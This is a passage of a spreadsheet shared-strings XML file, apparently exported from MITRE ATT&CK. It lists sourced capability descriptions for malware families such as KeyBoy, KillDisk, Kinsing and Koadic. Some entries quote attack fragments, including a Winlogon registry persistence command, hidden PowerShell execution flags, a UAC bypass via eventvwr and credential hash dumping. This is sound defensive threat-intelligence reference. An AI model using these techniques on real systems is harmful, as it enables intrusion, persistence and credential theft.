  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can assign hard-coded fallback domains for C2.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--b921077b-4a62-461c-aaec-9cd70b5cf5f8</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can delete files created on the victim's machine.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--8db11ec5-cf4e-413b-a0b6-b6a84753d996</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can hide the current window from the targeted user via the `ShowWindow` API function.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--17ac7d6e-828c-4b8c-84de-4e0575f1703a</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can download files to the compromised host.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--3fadfbe5-6ed1-4d6d-a5ed-a355506431ba</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can generate a sequence of dummy HTTP C2 requests to obscure traffic.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--a4da460a-10f9-4ae7-ac75-46460ba56f87</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can use the `ShowWindow` API to avoid detection.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--95ca9378-9ec1-43cb-9ffb-5f7c79cf7898</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) has Base64-encoded its configuration file.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--a4e96b11-6f07-422c-bf18-9866ee6fb6a9</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can use a custom protocol tunneled through DNS or HTTP.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--5ee6a7c8-a9a5-4445-8173-408caab5bcbc</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) has renamed an image of `cmd.exe` with a random name followed by a `.tmpl` extension.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--d04af539-cfb6-4662-8d5a-82dc85cfab1b</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can Base32 encode chunks of output files during exfiltration.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--21295e0f-33f4-44dc-a649-87d0e55f8ed7</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can enumerate the OS version and hostname of a targeted machine.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--2b9ce635-3ce2-4145-864e-70b0b09438b8</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can collect the MAC address and other information from a victim machine using `ipconfig/all`.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--205b4267-e86d-46a1-8aa6-61475cd90b80</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can sleep for a time interval between C2 communication attempts.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--bb97930f-9c3a-4fac-84b1-8f954633aef0</t>
  </si>
  <si>
    <t>Variants of [Kevin](https://attack.mitre.org/software/S1020) can communicate with C2 over HTTP.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--92b2d8ea-6a4d-4f23-b474-ccda6fb0bfd8</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can use a renamed image of `cmd.exe` for execution.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--a36a52d4-3f2a-4f67-8da1-de9ecae18ed4</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) attempts to collect passwords from browsers.(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>relationship--e49cb6bd-78c8-4826-a292-a7c5d3096d2b</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>relationship--b71738d0-d96e-4508-9820-ece76386903c</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) has a command to launch a file browser or explorer on the system.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>relationship--96ea567d-7113-4c2e-82c4-2ae6c6916ae9</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses &lt;code&gt;-w Hidden&lt;/code&gt; to conceal a [PowerShell](https://attack.mitre.org/techniques/T1059/001) window that downloads a payload. (Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>relationship--527e03b3-5b14-4a6c-ab05-0e18bac0357d</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) has a download and upload functionality.(Citation: PWC KeyBoys Feb 2017)(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>relationship--8833fac6-778f-4cf8-8b2a-6dee29164ffa</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) installs a keylogger for intercepting credentials and keystrokes.(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>relationship--65f57f42-9784-4ca2-8192-bfa90ffc075f</t>
  </si>
  <si>
    <t>In one version of [KeyBoy](https://attack.mitre.org/software/S0387), string obfuscation routines were used to hide many of the critical values referenced in the malware.(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>relationship--7a9deb99-21d7-45e3-bebc-fbab668690f1</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses PowerShell commands to download and execute payloads.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>relationship--b8f7512e-b0fe-4d27-ba63-bb99443d1b8c</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses custom SSL libraries to impersonate SSL in C2 traffic.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>relationship--63920a70-160d-46b3-a55f-05e8d7d30ba1</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses Python scripts for installing files and performing execution.(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>relationship--49d115fb-7a5a-4a6a-959d-0d76ab8394fb</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) has a command to perform screen grabbing.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>relationship--bd2f299e-e471-4f32-96b6-8dc32e872c74</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) can gather extended system information, such as information about the operating system, disks, and memory.(Citation: PWC KeyBoys Feb 2017)(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>relationship--0bc7c262-604c-42af-8829-ce9f579436d4</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) can determine the public or WAN IP address for the system.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>relationship--0aafbc63-2021-4c99-b273-1241943fd959</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) time-stomped its DLL in order to evade detection.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>relationship--8343b346-e529-4f28-a569-ae5f9a862ddf</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses VBS scripts for installing files and performing execution.(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>relationship--9b5e2072-35e7-4c62-baea-0e9d31df91f2</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) can launch interactive shells for communicating with the victim machine.(Citation: PWC KeyBoys Feb 2017)(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>relationship--e4768282-a422-45b3-9e60-43394063a468</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) installs a service pointing to a malicious DLL dropped to disk.(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>relationship--2b26c652-7f0e-41f1-810a-7e6c24f2bfdb</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) issues the command &lt;code&gt;reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”&lt;/code&gt; to achieve persistence.(Citation: PWC KeyBoys Feb 2017) (Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>relationship--e7cf6c6b-d777-4c61-b760-e8c6a5c48488</t>
  </si>
  <si>
    <t>S0276</t>
  </si>
  <si>
    <t>Keydnap</t>
  </si>
  <si>
    <t>malware--4b072c90-bc7a-432b-940e-016fc1c01761</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) prompts the users for credentials.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>relationship--7eef6b42-8c4c-4619-b0ed-fa17f16de722</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses a Launch Agent to persist.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>relationship--feccb439-0a34-4224-ba12-62e11215d5a5</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses a copy of tor2web proxy for HTTPS communications.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>relationship--02e4c930-ffc1-4bcb-a989-12db90671f90</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses Python for scripting to execute additional commands.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>relationship--e2dd48c1-c960-4f6f-ad99-5b2aa7463e68</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses a resource fork to present a macOS JPEG or text file icon rather than the executable's icon assigned by the operating system.(Citation: OSX Keydnap malware)</t>
  </si>
  <si>
    <t>relationship--4efc1b5d-c1cb-4d94-a4b8-6b0b2b857788</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses the keychaindump project to read securityd memory.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>relationship--433418bb-0771-4b2d-9d6c-a153f6819798</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) adds the setuid flag to a binary so it can easily elevate in the future.(Citation: OSX Keydnap malware)</t>
  </si>
  <si>
    <t>relationship--72b7d86e-5e78-4bc6-a16e-c4380d12d627</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>relationship--b9688abd-0f6d-4c76-8b73-d9fe7d11f07f</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses HTTPS for command and control.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>relationship--39556624-1c45-4178-bfa4-7a20b254df7e</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</si>
  <si>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</si>
  <si>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relationship--d84bda97-a8d5-4886-8172-c5a794b681af</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) deletes Application, Security, Setup, and System Windows Event Logs.(Citation: ESEST Black Energy Jan 2016)</t>
  </si>
  <si>
    <t>relationship--99c1668e-3e9c-4da1-8019-59b6c30f010e</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) deletes system files to make the OS unbootable. [KillDisk](https://attack.mitre.org/software/S0607) also targets and deletes files with 35 different file extensions.(Citation: ESEST Black Energy Jan 2016)</t>
  </si>
  <si>
    <t>relationship--e45c0080-ee1c-4ef1-813f-d58b83de4a8b</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) has a ransomware component that encrypts files with an AES key that is also RSA-1028 encrypted.(Citation: KillDisk Ransomware)</t>
  </si>
  <si>
    <t>relationship--c6cfaa54-2ce3-40c8-af91-cd09e6e9c167</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) overwrites the first sector of the Master Boot Record with “0x00”.(Citation: Trend Micro KillDisk 1)</t>
  </si>
  <si>
    <t>relationship--b12cc736-ee7a-4a70-b4f0-2048e218310f</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) has the ability to quit and delete itself.(Citation: ESET Telebots Dec 2016)</t>
  </si>
  <si>
    <t>relationship--c86a1525-d555-4467-8d1c-1f8b0c277d1c</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) has used the &lt;code&gt;FindNextFile&lt;/code&gt; command as part of its file deletion process.(Citation: Trend Micro KillDisk 2)</t>
  </si>
  <si>
    <t>relationship--1530b5b9-a559-42ac-a668-8133cb18e944</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) registers as a service under the Plug-And-Play Support name.(Citation: ESET Telebots Dec 2016)</t>
  </si>
  <si>
    <t>relationship--cb51ada4-7c8e-4f4b-a70c-af7f764ac878</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) has called the Windows API to retrieve the hard disk handle and shut down the machine.(Citation: Trend Micro KillDisk 1)</t>
  </si>
  <si>
    <t>relationship--1c69d2f9-1152-415a-9294-808886999e04</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) uses VMProtect to make reverse engineering the malware more difficult.(Citation: Trend Micro KillDisk 1)</t>
  </si>
  <si>
    <t>relationship--89567fdb-433a-4821-85bb-a4a9f55cfef5</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) has called &lt;code&gt;GetCurrentProcess&lt;/code&gt;.(Citation: Trend Micro KillDisk 2)</t>
  </si>
  <si>
    <t>relationship--75c7794b-e8e1-4fcb-b59a-14eb710c47f7</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) terminates various processes to get the user to reboot the victim machine.(Citation: Trend Micro KillDisk 2)</t>
  </si>
  <si>
    <t>relationship--8efafb84-44c7-405d-96b6-55d12f397d01</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) loads and executes functions from a DLL.(Citation: Trend Micro KillDisk 1)</t>
  </si>
  <si>
    <t>relationship--75640de7-9608-4c19-a0b3-6fb4816ec56a</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) retrieves the hard disk name by calling the &lt;code&gt;CreateFileA to \\.\PHYSICALDRIVE0&lt;/code&gt; API.(Citation: Trend Micro KillDisk 1)</t>
  </si>
  <si>
    <t>relationship--22b9eb17-686a-4cfe-b9a1-cffe22c7755f</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) attempts to reboot the machine by terminating specific processes.(Citation: Trend Micro KillDisk 2)</t>
  </si>
  <si>
    <t>relationship--9d6c5d09-94b9-4453-a26d-8b3ac79cfe7f</t>
  </si>
  <si>
    <t>S0599</t>
  </si>
  <si>
    <t>Kinsing</t>
  </si>
  <si>
    <t>malware--d6e55656-e43f-411f-a7af-45df650471c5</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has searched &lt;code&gt;bash_history&lt;/code&gt; for credentials.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--4b2303df-c73d-4617-bd56-4468b29a5036</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has attempted to brute force hosts over SSH.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--6c56201e-f348-43ea-8b51-8230d2bf0970</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) was executed with an Ubuntu container entry point that runs shell scripts.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--d0dedd7e-d480-4611-b4b2-90f1ba71091b</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used crontab to download and run shell scripts every minute to ensure persistence.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--b817a0c2-e93a-4bbd-ad96-b8a820562bc1</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) was run through a deployed Ubuntu container.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--102ece09-4129-4662-b05c-243709cd7d1d</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) was executed in an Ubuntu container deployed via an open Docker daemon API.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--b4728dde-0d7b-4650-910d-4778a07cbfa0</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used the find command to search for specific files.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--05282a2d-21c6-4150-94e0-d57c2f84c887</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has downloaded additional lateral movement scripts from C2.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--dd39f1a9-8eb4-4818-8597-ed228d7dba83</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used chmod to modify permissions on key files for use.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--4723be88-3553-4c1c-8cd1-8c68b161c1cf</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has searched for private keys.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--255347ba-c359-4a79-af44-089a502c6e9b</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used ps to list processes.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--df0d2dad-d384-4501-b2bc-659a7877489b</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used a script to parse files like &lt;code&gt;/etc/hosts&lt;/code&gt; and SSH &lt;code&gt;known_hosts&lt;/code&gt; to discover remote systems.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--ab0c8d2a-b2da-4566-96f5-1cbbc9a41300</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has created and run a Bitcoin cryptocurrency miner.(Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)</t>
  </si>
  <si>
    <t>relationship--fdf3767f-49ad-43f3-943c-486099ffa3a8</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used SSH for lateral movement.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--90893c7e-5080-40ff-92b2-d9c86e74b72c</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used Unix shell scripts to execute commands in the victim environment.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--2398e409-24d3-4dd9-9353-8b6cf9eee81d</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used valid SSH credentials to access remote hosts.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--13ebbab5-204d-4a61-9ee4-378346626371</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has communicated with C2 over HTTP.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>relationship--0d3bf2be-d9e2-480d-b64a-fea7e0bac12c</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to uninstall malware from the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--0aa51def-3a75-4c69-8b65-82559d8f4c83</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to list drives on the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--37e4bb23-505b-41bb-a2f4-98501b065598</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to conceal its activity through hiding active windows.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--7ded147e-f252-490a-b0d7-d8b3492c84eb</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to download and execute files.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--93dc6241-29b4-45c6-9593-f7862936ffd8</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to initiate keylogging on the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--7d086d88-59d1-444a-a766-ef52216625ff</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to remotely trigger keyboard input and mouse clicks. (Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--a51ea812-182b-47d8-94c2-331e4d9973f5</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to capture screenshots on the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--8a039d93-db2d-4a98-81d4-357425574bab</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use SSL and TLS for communications.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--d9b7596b-185a-4a2f-8559-6b9349f4c9b9</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) has 2 methods for elevating integrity. It can bypass UAC through `eventvwr.exe` and `sdclt.exe`.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--6b794c49-0734-446c-9192-5b1e1cf06be0</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can retrieve the current content of the user clipboard.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--66440b92-cfed-441c-85fd-1d103684a187</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can download files off the target system to send back to the server.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--cc9ffcec-db79-4913-91ae-ffd5cec643f7</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can perform process injection by using a reflective DLL.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--21674a10-7168-420e-b916-2979a3ee3b5e</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can obtain a list of directories.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--94472a50-e097-4b67-9f59-2840a1633a0f</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) has used the command &lt;code&gt;Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden&lt;/code&gt; to hide its window.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--3339e98d-9078-496e-bc24-8bcf5f86ac33</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can download additional files and tools.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--419392f5-e6a8-4eee-b7c2-f0bac5cce833</t>
  </si>
  <si>
    <t xml:space="preserve">[Koadic](https://attack.mitre.org/software/S0250) can use mshta to serve additional payloads and to help schedule tasks for persistence.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>relationship--1567d198-b2b9-4eda-a2e2-ba5dd4e51547</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can gather hashed passwords by gathering domain controller hashes from NTDS.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--a359e758-a95c-4064-b8d7-b8351489409e</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can scan for open TCP ports on the target network.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--72f5ca9f-6b0e-4051-b2ae-da1b59e6ed2b</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can scan local network for open SMB.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--f25505f6-dbd0-4d7b-8e8c-b3885f206cbf</t>
  </si>
  <si>
    <t xml:space="preserve">[Koadic](https://attack.mitre.org/software/S0250) has used PowerShell to establish persistence.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>relationship--635e93f3-ba76-43c5-961e-8464d4c257c3</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) has added persistence to the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` Registry key.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--969e4342-1635-4e0f-8855-47be84cddccf</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use Regsvr32 to execute additional payloads.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--2853aaaa-982e-49bf-a219-b4f16805b983</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can enable remote desktop on the victim's machine.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--7b0a1eb4-9797-41cd-b7a4-610cb9eb2c42</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use Rundll32 to execute additional payloads.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--f32e0356-d326-4dd7-9c5f-4c1c304d8862</t>
  </si>
  <si>
    <t xml:space="preserve">[Koadic](https://attack.mitre.org/software/S0250) has used scheduled tasks to add persistence.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>relationship--f5c05a9e-955d-459d-a761-228ec3803394</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can gather hashed passwords by dumping SAM/SECURITY hive.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--35e6542c-b796-478b-b42d-d5b4ddf511d5</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can run a command on another machine using [PsExec](https://attack.mitre.org/software/S0029).(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--aaa2f519-62f6-4dcb-8193-6ed33b8ff4ab</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can obtain the OS version and build, computer name, and processor architecture from a compromised host.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--055261fd-70cd-49c6-b9e6-2641bae4dda7</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can retrieve the contents of the IP routing table as well as information about the Windows domain.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--03be081b-574e-4ffd-807a-99163b6a6fa2</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can identify logged in users across the domain and views user sessions.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--3298bf92-55a2-49eb-aa5e-0530e8a51eeb</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode .(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--08738197-aa06-4177-acc2-10569c39f423</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) has used HTTP for C2 communications.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--540aa8c9-2a16-4c8a-be79-8dbd2d5d0ef4</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</si>
  <si>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</si>
  <si>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relationship--8674de47-b051-4384-a6e0-aeed32b8c270</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use WMI to execute commands.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>relationship--5ddcecdb-9e54-4e8e-b67b-64d24ec3264a</t>
  </si>
  <si>
    <t>S0641</t>
  </si>
  <si>
    <t>Kobalos</t>
  </si>
  <si>
    <t>malware--9abdda30-08e0-4ab1-9cf0-d447654c6de9</t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641)'s authentication and key exchange is performed using RSA-512.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021) </t>
  </si>
  <si>
    <t>relationship--e9475518-bc89-4120-9979-6a996b2de924</t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) can remove all command history on compromised hosts.(Citation: ESET Kobalos Feb 2021)	</t>
  </si>
  <si>
    <t>relationship--738e9055-48af-4295-a2f5-4f7e135d1fb2</t>
  </si>
  <si>
    <t>[Kobalos](https://attack.mitre.org/software/S0641) replaced the SSH client with a trojanized SSH client to steal credentials on compromised systems.(Citation: ESET Kobalos Jan 2021)</t>
  </si>
  <si>
    <t>relationship--5c365b61-0c14-41aa-b82a-052eb977062b</t>
  </si>
  <si>
